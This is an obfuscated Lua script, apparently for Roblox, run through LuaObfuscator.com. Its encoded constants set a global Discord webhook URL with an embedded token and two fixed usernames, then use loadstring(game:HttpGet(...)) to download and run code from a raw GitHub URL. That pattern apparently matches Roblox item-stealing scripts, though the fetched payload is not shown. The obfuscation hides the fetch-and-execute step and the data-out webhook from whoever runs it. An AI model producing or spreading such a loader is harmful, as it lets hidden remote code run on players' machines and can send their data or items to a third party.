--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((929 -(214 + 713))^(v32-(2 -1))))%((1 + 1)^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -(4 -3)))) ;return v83-(v83%((737 -(32 + 85)) -(555 + 63 + 1))) ;else local v84=0;local v85;while true do if (v84==(931 -(857 + 74))) then v85=(2 -0)^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and (1271 -(226 + 1044))) or 0 ;end end end end local function v21()local v34=(350 -(87 + 263)) + 0 ;local v35;while true do if (v34==(958 -(892 + 65))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1 -0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 ;return (v37 * (628 -372)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;return (v41 * (16778168 -(802 + 150))) + (v40 * ((128432 + 48012) -110908)) + (v39 * (464 -(1205 -(915 + 82)))) + v38 ;end local function v24()local v42=(0 -0) -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0)) then v45=1;v46=(v20(v44,1 -0 ,1207 -(1069 + 118) ) * ((4 -2)^(69 -37))) + v43 ;v42=1 + 0 + 1 ;end if (v42==(4 -1)) then if (v47==(0 + 0)) then if (v46==(791 -(368 + 423))) then return v48 * ((0 -0) -0) ;else v47=19 -(10 + 8) ;v45=0 -0 ;end elseif (v47==(2489 -(416 + 26))) then return ((v46==0) and (v48 * ((3 -2)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1809 -786) ) * (v45 + (v46/(2^((1740 -1250) -(145 + 293))))) ;end if (v42==0) then v43=v23();v44=v23();v42=431 -(44 + (1245 -(814 + 45))) ;end if (v42==(1488 -(998 + 488))) then v47=v20(v44,21,10 + (51 -30) );v48=((v20(v44,27 + 1 + 4 )==(773 -(201 + 571))) and  -1) or (1 + 0) ;v42=1141 -((1001 -(261 + 624)) + 1022) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1424 -(630 + 793)) );v18=v18 + v49 ;local v51={};for v66=1081 -(1020 + 60) , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((1474 -(1329 + 145))~=v52) then else v53=971 -(140 + 831) ;v54=nil;v52=1851 -(1409 + 441) ;end if ((1 -0)==v52) then v55=nil;v56=nil;v52=2;end if (v52~=(721 -(15 + 703))) then else v59=nil;while true do local v90=0;while true do if (v90~=0) then else if (v53~=0) then else v54={};v55={};v56={};v57={v54,v55,nil,v56};v53=689 -(198 + 490) ;end if (v53~=(243 -(187 + 54))) then else local v100=780 -(162 + 618) ;local v101;while true do if (v100==(0 + 0)) then v101=0 + 0 ;while true do if (v101~=1) then else return v57;end if (0==v101) then local v174=0 -0 ;while true do if (v174==1) then v101=1;break;end if ((0 -0)==v174) then for v175=1,v23() do local v176=1206 -(696 + 510) ;local v177;local v178;while true do if (v176==(0 -0)) then v177=0 + 0 ;v178=nil;v176=1637 -(1373 + 263) ;end if (v176~=(1001 -(451 + 549))) then else while true do if (v177==(0 -0)) then v178=v21();if (v20(v178,1 -0 ,1263 -(1091 + 171) )~=(1384 -(746 + 638))) then else local v181=0;local v182;local v183;local v184;local v185;while true do if (v181==(1 + 1)) then while true do if ((1 + 2)==v182) then if (v20(v184,344 -(218 + 123) ,1584 -(1535 + 46) )==(3 -2)) then v185[1 + 3 ]=v59[v185[4]];end v54[v175]=v185;break;end if (v182~=(3 -2)) then else local v187=0;while true do if (v187~=0) then else v185={v22(),v22(),nil,nil};if (v183==(0 + 0)) then local v195=0 -0 ;while true do if (v195==(0 -0)) then v185[3]=v22();v185[4]=v22();break;end end elseif (v183==1) then v185[701 -(208 + 490) ]=v23();elseif (v183==2) then v185[1 + 2 ]=v23() -(2^(588 -(426 + 146))) ;elseif (v183~=(2 + 1)) then else local v200=0;local v201;while true do if (v200==(836 -(660 + 176))) then v201=0 + 0 ;while true do if (v201==(202 -(14 + 188))) then v185[678 -(534 + 141) ]=v23() -(2^(7 + 9)) ;v185[4 + 0 ]=v22();break;end end break;end end end v187=1 + 0 ;end if (v187~=1) then else v182=1 + 1 ;break;end end end if (v182==(3 -1)) then if (v20(v184,1,1 -0 )==(2 -1)) then v185[2]=v59[v185[2]];end if (v20(v184,2,1253 -(721 + 530) )~=(1272 -(945 + 326))) then else v185[3]=v59[v185[7 -4 ]];end v182=2 + 1 ;end if (v182~=0) then else local v188=0 + 0 ;while true do if ((396 -(115 + 281))==v188) then v183=v20(v178,4 -2 ,3 + 0 );v184=v20(v178,4 + 0 ,1092 -(461 + 625) );v188=2 -1 ;end if (v188==(1289 -(993 + 295))) then v182=1 + 0 ;break;end end end end break;end if (v181==(1171 -(418 + 753))) then v182=0 -0 ;v183=nil;v181=868 -(550 + 317) ;end if (v181==(1 + 0)) then v184=nil;v185=nil;v181=2 -0 ;end end end break;end end break;end end end for v179=1 + 0 ,v23() do v55[v179-(1 -0) ]=v28();end v174=1 + 0 ;end end end end break;end end end v90=1;end if (v90~=(530 -(406 + 123))) then else if ((2 -1)~=v53) then else v58=v23();v59={};for v103=286 -(134 + 151) ,v58 do local v104=0;local v105;local v106;while true do if ((1770 -(1749 + 20))==v104) then if (v105==1) then v106=v21()~=(0 + 0) ;elseif (v105==(1667 -(970 + 695))) then v106=v24();elseif (v105==3) then v106=v25();end v59[v103]=v106;break;end if (v104==0) then v105=v21();v106=nil;v104=1;end end end v57[3]=v21();v53=2;end break;end end end break;end if (v52~=(1324 -(1249 + 73))) then else v57=nil;v58=nil;v52=2 + 1 ;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v62[v80[3]];elseif (v81==1) then v78[v80[2]]=v80[3];else do return;end end elseif (v81<=3) then v78[v80[2]][v80[3]]=v80[4];elseif (v81>4) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v72=v80[3];end elseif (v81<=8) then if (v81<=6) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==7) then local v110=v80[2];v78[v110]=v78[v110](v13(v78,v110 + 1 ,v73));else local v112=0;while true do if (v112==1) then v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v112=2;end if (v112==3) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v112=4;end if (4==v112) then v72=v80[3];break;end if (v112==2) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v112=3;end if (0==v112) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v112=1;end end end elseif (v81<=10) then if (v81>9) then v78[v80[2]]();else local v113=0;local v114;local v115;local v116;local v117;local v118;while true do if (v113==0) then v114=nil;v115,v116=nil;v117=nil;v118=nil;v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v113=1;end if (v113==2) then v80=v68[v72];v118=v80[2];v117=v78[v80[3]];v78[v118 + 1 ]=v117;v78[v118]=v117[v80[4]];v72=v72 + 1 ;v113=3;end if (v113==4) then v80=v68[v72];v118=v80[2];v115,v116=v71(v78[v118](v13(v78,v118 + 1 ,v80[3])));v73=(v116 + v118) -1 ;v114=0;for v169=v118,v73 do v114=v114 + 1 ;v78[v169]=v115[v114];end v113=5;end if (3==v113) then v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v113=4;end if (1==v113) then v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v113=2;end if (v113==6) then v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];break;end if (v113==5) then v72=v72 + 1 ;v80=v68[v72];v118=v80[2];v78[v118]=v78[v118](v13(v78,v118 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v113=6;end end end elseif (v81==11) then local v119=v80[2];local v120,v121=v71(v78[v119](v13(v78,v119 + 1 ,v80[3])));v73=(v121 + v119) -1 ;local v122=0;for v126=v119,v73 do local v127=0;while true do if (v127==0) then v122=v122 + 1 ;v78[v126]=v120[v122];break;end end end else local v123=0;local v124;local v125;while true do if (v123==1) then v78[v124 + 1 ]=v125;v78[v124]=v125[v80[4]];break;end if (v123==0) then v124=v80[2];v125=v78[v80[3]];v123=1;end end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132343639323532383O3239373O30372F37394B6E65586865592O3478587736674A654B4D5A7A2O6D5835784258764F6B596C6657434D637344454E73564349637038646E5947553457473548744D525158306975030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030B3O0068652O6C6F5F313233736103093O00557365724E616D653200173O0012013O00013O0026053O000E00010002002O043O000E000100122O000100033O00300900010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026053O000100010001002O043O0001000100122O000100033O0030080001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00023O00017O00",v9(),...);end
